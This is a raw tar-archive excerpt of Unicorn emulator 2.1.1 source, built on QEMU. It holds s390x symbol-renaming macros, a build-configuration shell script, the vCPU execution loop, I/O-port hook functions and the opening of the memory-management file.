helper_atomic_fetch_umaxl_be_s390x #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_s390x #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_s390x #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_s390x #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_s390x #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_s390x #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_s390x #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_s390x #define helper_atomic_xchgq_le helper_atomic_xchgq_le_s390x #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_s390x #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_s390x #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_s390x #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_s390x #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_s390x #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_s390x #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_s390x #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_s390x #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_s390x #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_s390x #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_s390x #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_s390x #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_s390x #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_s390x #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_s390x #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_s390x #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_s390x #define helper_atomic_xchgq_be helper_atomic_xchgq_be_s390x #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_s390x #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_s390x #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_s390x #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_s390x #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_s390x #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_s390x #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_s390x #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_s390x #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_s390x #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_s390x #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_s390x #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_s390x #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_s390x #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_s390x #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_s390x #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_s390x #define cpu_ldub_code cpu_ldub_code_s390x #define cpu_lduw_code cpu_lduw_code_s390x #define cpu_ldl_code cpu_ldl_code_s390x #define cpu_ldq_code cpu_ldq_code_s390x #define helper_div_i32 helper_div_i32_s390x #define helper_rem_i32 helper_rem_i32_s390x #define helper_divu_i32 helper_divu_i32_s390x #define helper_remu_i32 helper_remu_i32_s390x #define helper_shl_i64 helper_shl_i64_s390x #define helper_shr_i64 helper_shr_i64_s390x #define helper_sar_i64 helper_sar_i64_s390x #define helper_div_i64 helper_div_i64_s390x #define helper_rem_i64 helper_rem_i64_s390x #define helper_divu_i64 helper_divu_i64_s390x #define helper_remu_i64 helper_remu_i64_s390x #define helper_muluh_i64 helper_muluh_i64_s390x #define helper_mulsh_i64 helper_mulsh_i64_s390x #define helper_clz_i32 helper_clz_i32_s390x #define helper_ctz_i32 helper_ctz_i32_s390x #define helper_clz_i64 helper_clz_i64_s390x #define helper_ctz_i64 helper_ctz_i64_s390x #define helper_clrsb_i32 helper_clrsb_i32_s390x #define helper_clrsb_i64 helper_clrsb_i64_s390x #define helper_ctpop_i32 helper_ctpop_i32_s390x #define helper_ctpop_i64 helper_ctpop_i64_s390x #define helper_lookup_tb_ptr helper_lookup_tb_ptr_s390x #define helper_exit_atomic helper_exit_atomic_s390x #define helper_gvec_add8 helper_gvec_add8_s390x #define helper_gvec_add16 helper_gvec_add16_s390x #define helper_gvec_add32 helper_gvec_add32_s390x #define helper_gvec_add64 helper_gvec_add64_s390x #define helper_gvec_adds8 helper_gvec_adds8_s390x #define helper_gvec_adds16 helper_gvec_adds16_s390x #define helper_gvec_adds32 helper_gvec_adds32_s390x #define helper_gvec_adds64 helper_gvec_adds64_s390x #define helper_gvec_sub8 helper_gvec_sub8_s390x #define helper_gvec_sub16 helper_gvec_sub16_s390x #define helper_gvec_sub32 helper_gvec_sub32_s390x #define helper_gvec_sub64 helper_gvec_sub64_s390x #define helper_gvec_subs8 helper_gvec_subs8_s390x #define helper_gvec_subs16 helper_gvec_subs16_s390x #define helper_gvec_subs32 helper_gvec_subs32_s390x #define helper_gvec_subs64 helper_gvec_subs64_s390x #define helper_gvec_mul8 helper_gvec_mul8_s390x #define helper_gvec_mul16 helper_gvec_mul16_s390x #define helper_gvec_mul32 helper_gvec_mul32_s390x #define helper_gvec_mul64 helper_gvec_mul64_s390x #define helper_gvec_muls8 helper_gvec_muls8_s390x #define helper_gvec_muls16 helper_gvec_muls16_s390x #define helper_gvec_muls32 helper_gvec_muls32_s390x #define helper_gvec_muls64 helper_gvec_muls64_s390x #define helper_gvec_neg8 helper_gvec_neg8_s390x #define helper_gvec_neg16 helper_gvec_neg16_s390x #define helper_gvec_neg32 helper_gvec_neg32_s390x #define helper_gvec_neg64 helper_gvec_neg64_s390x #define helper_gvec_abs8 helper_gvec_abs8_s390x #define helper_gvec_abs16 helper_gvec_abs16_s390x #define helper_gvec_abs32 helper_gvec_abs32_s390x #define helper_gvec_abs64 helper_gvec_abs64_s390x #define helper_gvec_mov helper_gvec_mov_s390x #define helper_gvec_dup64 helper_gvec_dup64_s390x #define helper_gvec_dup32 helper_gvec_dup32_s390x #define helper_gvec_dup16 helper_gvec_dup16_s390x #define helper_gvec_dup8 helper_gvec_dup8_s390x #define helper_gvec_not helper_gvec_not_s390x #define helper_gvec_and helper_gvec_and_s390x #define helper_gvec_or helper_gvec_or_s390x #define helper_gvec_xor helper_gvec_xor_s390x #define helper_gvec_andc helper_gvec_andc_s390x #define helper_gvec_orc helper_gvec_orc_s390x #define helper_gvec_nand helper_gvec_nand_s390x #define helper_gvec_nor helper_gvec_nor_s390x #define helper_gvec_eqv helper_gvec_eqv_s390x #define helper_gvec_ands helper_gvec_ands_s390x #define helper_gvec_xors helper_gvec_xors_s390x #define helper_gvec_ors helper_gvec_ors_s390x #define helper_gvec_shl8i helper_gvec_shl8i_s390x #define helper_gvec_shl16i helper_gvec_shl16i_s390x #define helper_gvec_shl32i helper_gvec_shl32i_s390x #define helper_gvec_shl64i helper_gvec_shl64i_s390x #define helper_gvec_shr8i helper_gvec_shr8i_s390x #define helper_gvec_shr16i helper_gvec_shr16i_s390x #define helper_gvec_shr32i helper_gvec_shr32i_s390x #define helper_gvec_shr64i helper_gvec_shr64i_s390x #define helper_gvec_sar8i helper_gvec_sar8i_s390x #define helper_gvec_sar16i helper_gvec_sar16i_s390x #define helper_gvec_sar32i helper_gvec_sar32i_s390x #define helper_gvec_sar64i helper_gvec_sar64i_s390x #define helper_gvec_shl8v helper_gvec_shl8v_s390x #define helper_gvec_shl16v helper_gvec_shl16v_s390x #define helper_gvec_shl32v helper_gvec_shl32v_s390x #define helper_gvec_shl64v helper_gvec_shl64v_s390x #define helper_gvec_shr8v helper_gvec_shr8v_s390x #define helper_gvec_shr16v helper_gvec_shr16v_s390x #define helper_gvec_shr32v helper_gvec_shr32v_s390x #define helper_gvec_shr64v helper_gvec_shr64v_s390x #define helper_gvec_sar8v helper_gvec_sar8v_s390x #define helper_gvec_sar16v helper_gvec_sar16v_s390x #define helper_gvec_sar32v helper_gvec_sar32v_s390x #define helper_gvec_sar64v helper_gvec_sar64v_s390x #define helper_gvec_eq8 helper_gvec_eq8_s390x #define helper_gvec_ne8 helper_gvec_ne8_s390x #define helper_gvec_lt8 helper_gvec_lt8_s390x #define helper_gvec_le8 helper_gvec_le8_s390x #define helper_gvec_ltu8 helper_gvec_ltu8_s390x #define helper_gvec_leu8 helper_gvec_leu8_s390x #define helper_gvec_eq16 helper_gvec_eq16_s390x #define helper_gvec_ne16 helper_gvec_ne16_s390x #define helper_gvec_lt16 helper_gvec_lt16_s390x #define helper_gvec_le16 helper_gvec_le16_s390x #define helper_gvec_ltu16 helper_gvec_ltu16_s390x #define helper_gvec_leu16 helper_gvec_leu16_s390x #define helper_gvec_eq32 helper_gvec_eq32_s390x #define helper_gvec_ne32 helper_gvec_ne32_s390x #define helper_gvec_lt32 helper_gvec_lt32_s390x #define helper_gvec_le32 helper_gvec_le32_s390x #define helper_gvec_ltu32 helper_gvec_ltu32_s390x #define helper_gvec_leu32 helper_gvec_leu32_s390x #define helper_gvec_eq64 helper_gvec_eq64_s390x #define helper_gvec_ne64 helper_gvec_ne64_s390x #define helper_gvec_lt64 helper_gvec_lt64_s390x #define helper_gvec_le64 helper_gvec_le64_s390x #define helper_gvec_ltu64 helper_gvec_ltu64_s390x #define helper_gvec_leu64 helper_gvec_leu64_s390x #define helper_gvec_ssadd8 helper_gvec_ssadd8_s390x #define helper_gvec_ssadd16 helper_gvec_ssadd16_s390x #define helper_gvec_ssadd32 helper_gvec_ssadd32_s390x #define helper_gvec_ssadd64 helper_gvec_ssadd64_s390x #define helper_gvec_sssub8 helper_gvec_sssub8_s390x #define helper_gvec_sssub16 helper_gvec_sssub16_s390x #define helper_gvec_sssub32 helper_gvec_sssub32_s390x #define helper_gvec_sssub64 helper_gvec_sssub64_s390x #define helper_gvec_usadd8 helper_gvec_usadd8_s390x #define helper_gvec_usadd16 helper_gvec_usadd16_s390x #define helper_gvec_usadd32 helper_gvec_usadd32_s390x #define helper_gvec_usadd64 helper_gvec_usadd64_s390x #define helper_gvec_ussub8 helper_gvec_ussub8_s390x #define helper_gvec_ussub16 helper_gvec_ussub16_s390x #define helper_gvec_ussub32 helper_gvec_ussub32_s390x #define helper_gvec_ussub64 helper_gvec_ussub64_s390x #define helper_gvec_smin8 helper_gvec_smin8_s390x #define helper_gvec_smin16 helper_gvec_smin16_s390x #define helper_gvec_smin32 helper_gvec_smin32_s390x #define helper_gvec_smin64 helper_gvec_smin64_s390x #define helper_gvec_smax8 helper_gvec_smax8_s390x #define helper_gvec_smax16 helper_gvec_smax16_s390x #define helper_gvec_smax32 helper_gvec_smax32_s390x #define helper_gvec_smax64 helper_gvec_smax64_s390x #define helper_gvec_umin8 helper_gvec_umin8_s390x #define helper_gvec_umin16 helper_gvec_umin16_s390x #define helper_gvec_umin32 helper_gvec_umin32_s390x #define helper_gvec_umin64 helper_gvec_umin64_s390x #define helper_gvec_umax8 helper_gvec_umax8_s390x #define helper_gvec_umax16 helper_gvec_umax16_s390x #define helper_gvec_umax32 helper_gvec_umax32_s390x #define helper_gvec_umax64 helper_gvec_umax64_s390x #define helper_gvec_bitsel helper_gvec_bitsel_s390x #define cpu_restore_state cpu_restore_state_s390x #define page_collection_lock page_collection_lock_s390x #define page_collection_unlock page_collection_unlock_s390x #define free_code_gen_buffer free_code_gen_buffer_s390x #define tcg_exec_init tcg_exec_init_s390x #define tb_cleanup tb_cleanup_s390x #define tb_flush tb_flush_s390x #define tb_phys_invalidate tb_phys_invalidate_s390x #define tb_gen_code tb_gen_code_s390x #define tb_exec_lock tb_exec_lock_s390x #define tb_exec_unlock tb_exec_unlock_s390x #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_s390x #define tb_invalidate_phys_range tb_invalidate_phys_range_s390x #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_s390x #define tb_check_watchpoint tb_check_watchpoint_s390x #define cpu_io_recompile cpu_io_recompile_s390x #define tb_flush_jmp_cache tb_flush_jmp_cache_s390x #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_s390x #define translator_loop_temp_check translator_loop_temp_check_s390x #define translator_loop translator_loop_s390x #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_s390x #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_s390x #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_s390x #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_s390x #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_s390x #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_s390x #define unassigned_mem_ops unassigned_mem_ops_s390x #define floatx80_infinity floatx80_infinity_s390x #define dup_const_func dup_const_func_s390x #define gen_helper_raise_exception gen_helper_raise_exception_s390x #define gen_helper_raise_interrupt gen_helper_raise_interrupt_s390x #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_s390x #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_s390x #define gen_helper_cpsr_read gen_helper_cpsr_read_s390x #define gen_helper_cpsr_write gen_helper_cpsr_write_s390x #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_s390x #define helper_uc_s390x_exit helper_uc_s390x_exit_s390x #define tcg_s390_tod_updated tcg_s390_tod_updated_s390x #define tcg_s390_program_interrupt tcg_s390_program_interrupt_s390x #define tcg_s390_data_exception tcg_s390_data_exception_s390x #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/scripts/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015642�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/scripts/create_config������������������������������������������������������������0000775�0000000�0000000�00000005727�14675241067�0020373�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh echo "/* Automatically generated by create_config - do not modify */" while read line; do case $line in VERSION=*) # configuration version=${line#*=} major=$(echo "$version" | cut -d. -f1) minor=$(echo "$version" | cut -d. -f2) micro=$(echo "$version" | cut -d. -f3) echo "#define QEMU_VERSION \"$version\"" echo "#define QEMU_VERSION_MAJOR $major" echo "#define QEMU_VERSION_MINOR $minor" echo "#define QEMU_VERSION_MICRO $micro" ;; qemu_*dir=* | qemu_*path=*) # qemu-specific directory configuration name=${line%=*} value=${line#*=} define_name=$(echo $name | LC_ALL=C tr '[a-z]' '[A-Z]') eval "define_value=\"$value\"" echo "#define CONFIG_$define_name \"$define_value\"" # save for the next definitions eval "$name=\$define_value" ;; prefix=*) # save for the next definitions prefix=${line#*=} ;; IASL=*) # iasl executable value=${line#*=} echo "#define CONFIG_IASL $value" ;; CONFIG_AUDIO_DRIVERS=*) drivers=${line#*=} echo "#define CONFIG_AUDIO_DRIVERS \\" for drv in $drivers; do echo " \"${drv}\",\\" done echo "" ;; CONFIG_BDRV_RW_WHITELIST=*) echo "#define CONFIG_BDRV_RW_WHITELIST\\" for drv in ${line#*=}; do echo " \"${drv}\",\\" done echo " NULL" ;; CONFIG_BDRV_RO_WHITELIST=*) echo "#define CONFIG_BDRV_RO_WHITELIST\\" for drv in ${line#*=}; do echo " \"${drv}\",\\" done echo " NULL" ;; CONFIG_*=y) # configuration name=${line%=*} echo "#define $name 1" ;; CONFIG_*=n) # configuration ;; CONFIG_*=*) # configuration name=${line%=*} value=${line#*=} echo "#define $name $value" ;; HAVE_*=y) # configuration name=${line%=*} echo "#define $name 1" ;; HAVE_*=*) # configuration name=${line%=*} value=${line#*=} echo "#define $name $value" ;; ARCH=*) # configuration arch=${line#*=} arch_name=$(echo $arch | LC_ALL=C tr '[a-z]' '[A-Z]') echo "#define HOST_$arch_name 1" ;; HOST_USB=*) # do nothing ;; HOST_CC=*) # do nothing ;; HOST_*=y) # configuration name=${line%=*} echo "#define $name 1" ;; HOST_*=*) # configuration name=${line%=*} value=${line#*=} echo "#define $name $value" ;; TARGET_BASE_ARCH=*) # configuration target_base_arch=${line#*=} base_arch_name=$(echo $target_base_arch | LC_ALL=C tr '[a-z]' '[A-Z]') echo "#define TARGET_$base_arch_name 1" ;; TARGET_XML_FILES=*) # do nothing ;; TARGET_ABI_DIR=*) # do nothing ;; TARGET_NAME=*) target_name=${line#*=} echo "#define TARGET_NAME \"$target_name\"" ;; TARGET_DIRS=*) # do nothing ;; TARGET_*=y) # configuration name=${line%=*} echo "#define $name 1" ;; TARGET_*=*) # configuration name=${line%=*} value=${line#*=} echo "#define $name $value" ;; DSOSUF=*) echo "#define HOST_DSOSUF \"${line#*=}\"" ;; esac done # read �����������������������������������������unicorn-2.1.1/qemu/softmmu/�������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015645�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/cpus.c�������������������������������������������������������������������0000664�0000000�0000000�00000014476�14675241067�0016777�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "sysemu/tcg.h" #include "sysemu/cpus.h" #include "qemu/bitmap.h" #include "tcg/tcg.h" #include "exec/tb-hash.h" #include "accel/tcg/translate-all.h" #include "uc_priv.h" int64_t cpu_icount_to_ns(int64_t icount) { // return icount << atomic_read(&timers_state.icount_time_shift); // from configure_icount(QemuOpts *opts, Error **errp) /* 125MIPS seems a reasonable initial guess at the guest speed. It will be corrected fairly quickly anyway. */ // timers_state.icount_time_shift = 3; return icount << 3; } bool cpu_is_stopped(CPUState *cpu) { return cpu->stopped; } /* return the time elapsed in VM between vm_start and vm_stop. Unless * icount is active, cpu_get_ticks() uses units of the host CPU cycle * counter. */ int64_t cpu_get_ticks(void) { return cpu_get_host_ticks(); } /* Return the monotonic time elapsed in VM, i.e., * the time between vm_start and vm_stop */ int64_t cpu_get_clock(void) { return get_clock(); } static bool cpu_can_run(CPUState *cpu) { if (cpu->stop) { return false; } if (cpu_is_stopped(cpu)) { return false; } return true; } static void cpu_handle_guest_debug(CPUState *cpu) { cpu->stopped = true; } static int tcg_cpu_exec(struct uc_struct *uc) { int r; bool finish = false; while (!uc->exit_request) { CPUState *cpu = uc->cpu; //qemu_clock_enable(QEMU_CLOCK_VIRTUAL, // (cpu->singlestep_enabled & SSTEP_NOTIMER) == 0); if (cpu_can_run(cpu)) { uc->quit_request = false; r = cpu_exec(uc, cpu); // quit current TB but continue emulating? if (uc->quit_request && !uc->stop_request) { // reset stop_request uc->stop_request = false; // resume cpu cpu->halted = 0; cpu->exit_request = 0; cpu->exception_index = -1; cpu_resume(cpu); } else if (uc->stop_request) { //printf(">>> got STOP request!!!\n"); finish = true; break; } // save invalid memory access error & quit if (uc->invalid_error) { // printf(">>> invalid memory accessed, STOP = %u!!!\n", env->invalid_error); finish = true; break; } // printf(">>> stop with r = %x, HLT=%x\n", r, EXCP_HLT); if (r == EXCP_DEBUG) { cpu_handle_guest_debug(cpu); break; } if (r == EXCP_HLT) { //printf(">>> got HLT!!!\n"); finish = true; break; } } else if (cpu->stop || cpu->stopped) { // printf(">>> got stopped!!!\n"); break; } } uc->exit_request = 0; uc->cpu->exit_request = 0; uc->cpu->icount_decr_ptr->u16.high = 0; uc->cpu->tcg_exit_req = 0; return finish; } void cpu_resume(CPUState *cpu) { cpu->stop = false; cpu->stopped = false; } static void qemu_tcg_init_vcpu(CPUState *cpu) { /* * Initialize TCG regions--once. Now is a good time, because: * (1) TCG's init context, prologue and target globals have been set up. * (2) qemu_tcg_mttcg_enabled() works now (TCG init code runs before the * -accel flag is processed, so the check doesn't work then). */ tcg_region_init(cpu->uc->tcg_ctx); cpu->created = true; } void qemu_init_vcpu(CPUState *cpu) { cpu->nr_cores = 1; cpu->nr_threads = 1; cpu->stopped = true; qemu_tcg_init_vcpu(cpu); return; } void cpu_stop_current(struct uc_struct *uc) { if (uc->cpu) { uc->cpu->stop = false; uc->cpu->stopped = true; cpu_exit(uc->cpu); } } static inline gboolean uc_exit_invalidate_iter(gpointer key, gpointer val, gpointer data) { uint64_t exit = *((uint64_t*)key); uc_engine *uc = (uc_engine*)data; if (exit != 0) { // Unicorn: Why addr - 1? // // 0: INC ecx // 1: DEC edx <--- We put exit here, then the range of TB is [0, 1) // // While tb_invalidate_phys_range invalides [start, end) // // This function is designed to used with g_tree_foreach uc->uc_invalidate_tb(uc, exit - 1, 1); } return false; } void resume_all_vcpus(struct uc_struct* uc) { CPUState *cpu = uc->cpu; cpu->halted = 0; cpu->exit_request = 0; cpu->exception_index = -1; cpu_resume(cpu); /* static void qemu_tcg_cpu_loop(struct uc_struct *uc) */ cpu->created = true; while (true) { if (tcg_cpu_exec(uc)) { break; } } // clear the cache of the exits address, since the generated code // at that address is to exit emulation, but not for the instruction there. // if we dont do this, next time we cannot emulate at that address if (uc->use_exits) { g_tree_foreach(uc->ctl_exits, uc_exit_invalidate_iter, (void*)uc); } else { uc_exit_invalidate_iter((gpointer)&uc->exits[uc->nested_level - 1], NULL, (gpointer)uc); } cpu->created = false; } void vm_start(struct uc_struct* uc) { resume_all_vcpus(uc); } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/ioport.c�����������������������������������������������������������������0000664�0000000�0000000�00000012430�14675241067�0017325�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU System Emulator * * Copyright (c) 2003-2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* * splitted out ioport related stuffs from vl.c. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/memory.h" #include "uc_priv.h" #include "tcg/tcg-apple-jit.h" void cpu_outb(struct uc_struct *uc, uint32_t addr, uint8_t val) { // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // &val, 1); //LOG_IOPORT("outb: %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 1, val, hook->user_data)); } } } void cpu_outw(struct uc_struct *uc, uint32_t addr, uint16_t val) { // uint8_t buf[2]; // stw_p(buf, val); // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // buf, 2); //LOG_IOPORT("outw: %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 2, val, hook->user_data)); } } } void cpu_outl(struct uc_struct *uc, uint32_t addr, uint32_t val) { // uint8_t buf[4]; // stl_p(buf, val); // address_space_write(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // buf, 4); //LOG_IOPORT("outl: %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); // Unicorn: call registered OUT callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_OUT) { JIT_CALLBACK_GUARD(((uc_cb_insn_out_t)hook->callback)(uc, addr, 4, val, hook->user_data)); } } } uint8_t cpu_inb(struct uc_struct *uc, uint32_t addr) { // uint8_t val; // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, // &val, 1); //LOG_IOPORT("inb : %04"FMT_pioaddr" %02"PRIx8"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint8_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 1, hook->user_data)); return ret; } } return 0; } uint16_t cpu_inw(struct uc_struct *uc, uint32_t addr) { // uint8_t buf[2]; // uint16_t val; // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, buf, 2); // val = lduw_p(buf); //LOG_IOPORT("inw : %04"FMT_pioaddr" %04"PRIx16"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint16_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 2, hook->user_data)); return ret; } } return 0; } uint32_t cpu_inl(struct uc_struct *uc, uint32_t addr) { // uint8_t buf[4]; // uint32_t val; // printf("inl_addr=%x\n", addr); // address_space_read(&uc->address_space_io, addr, MEMTXATTRS_UNSPECIFIED, buf, 4); // val = ldl_p(buf); //LOG_IOPORT("inl : %04"FMT_pioaddr" %08"PRIx32"\n", addr, val); // Unicorn: call registered IN callbacks struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (hook->insn == UC_X86_INS_IN) { uint32_t ret; JIT_CALLBACK_GUARD_VAR(ret, ((uc_cb_insn_in_t)hook->callback)(uc, addr, 4, hook->user_data)); return ret; } } return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/softmmu/memory.c�����������������������������������������������������������������0000664�0000000�0000000�00000132746�14675241067�0017336�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Physical memory management * * Copyright 2011 Red Hat, Inc. and/or its affiliates * * Authors: * Avi Kivity <avi@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2. See * the COPYING file in the top-level directory. * * Contributions after 2012-01-13 are licensed under the terms of the * GNU GPL, version 2 or (at your option) any later version. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/memory.h" #include "qemu/bitops.h" #include "exec/memory-internal.h" #include "exec/ram_addr.h" #include "sysemu/tcg.h" #include "exec/exec-all.h" #include "uc_priv.h" //#define DEBUG_UNASSIGNED void memory_region_transaction_begin(void); void memory_region_transaction_commit(MemoryRegion *mr); typedef struct AddrRange AddrRange; /* * Note that signed integers are needed for negative offsetting in aliases * (large MemoryRegion::alias_offset). */ struct AddrRange { Int128 start; Int128 size; }; // Unicorn engine MemoryRegion *memory_map(struct uc_struct *uc, hwaddr begin, size_t size, uint32_t perms) { MemoryRegion *ram = g_new(MemoryRegion, 1); memory_region_init_ram(uc, ram, size, perms); if (ram->addr == -1 || !ram->ram_block) { // out of memory g_free(ram); return NULL; } memory_region_add_subregion_overlap(uc->system_memory, begin, ram, uc->snapshot_level); if (uc->cpu) { tlb_flush(uc->cpu); } return ram; } 